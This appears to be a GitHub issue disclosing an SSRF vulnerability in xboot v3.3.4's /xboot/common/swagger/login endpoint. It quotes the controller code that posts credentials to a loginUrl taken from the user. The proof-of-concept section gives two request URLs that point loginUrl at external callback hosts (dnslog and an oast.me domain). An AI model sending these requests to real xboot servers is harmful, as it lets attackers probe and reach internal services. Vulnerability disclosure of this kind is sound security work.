SSRF vulnerability on /xboot/common/swagger/login #70
Description
Summary
A SSRF vulnerability was discovered on the endpoint /xboot/common/swagger/login in latest version (v3.3.4) of xboot. The target URI parameter for network requests is user-controllable and lacks sufficient security processing, resulting in an SSRF vulnerability that allows attackers to exploit this flaw to probe and exploit internal services of the target system.
Details
- xboot-fast/src/main/java/cn/exrick/xboot/modules/base/controller/common/SecurityController.java
@RestController
@Api(tags = "Security相关接口")
@RequestMapping("/xboot/common")
@Transactional
public class SecurityController {
@RequestMapping(value = "/needLogin", method = RequestMethod.GET)
@ApiOperation(value = "没有登录")
public Result<Object> needLogin() {
return ResultUtil.error(401, "您还未登录");
}
@RequestMapping(value = "/swagger/login", method = RequestMethod.GET)
@ApiOperation(value = "Swagger接口文档专用登录接口 方便测试")
public Result<Object> swaggerLogin(@RequestParam String username, @RequestParam String password,
@ApiParam("图片验证码ID") @RequestParam(required = false) String captchaId,
@ApiParam("验证码") @RequestParam(required = false) String code,
@ApiParam("记住密码") @RequestParam(required = false, defaultValue = "true") Boolean saveLogin,
@ApiParam("可自定义登录接口地址")
@RequestParam(required = false, defaultValue = "http://127.0.0.1:8888/xboot/login")
String loginUrl) {
Map<String, Object> params = new HashMap<>(16);
params.put("username", username);
params.put("password", password);
params.put("captchaId", captchaId);
params.put("code", code);
params.put("saveLogin", saveLogin);
String result = HttpUtil.post(loginUrl, params);
return ResultUtil.data(result);
}
}
POC
http://localhost:9999/xboot/common/swagger/login?loginUrl=https://dnslog/&username=x&password=x
http://localhost:9999/xboot/common/swagger/login?loginUrl=https://d1vif4ev0le7bmrt4se0gjs1qcw1a5jgw.oast.me&username=x&password=x
Impact
https://portswigger.net/web-security/ssrf#what-is-the-impact-of-ssrf-attacks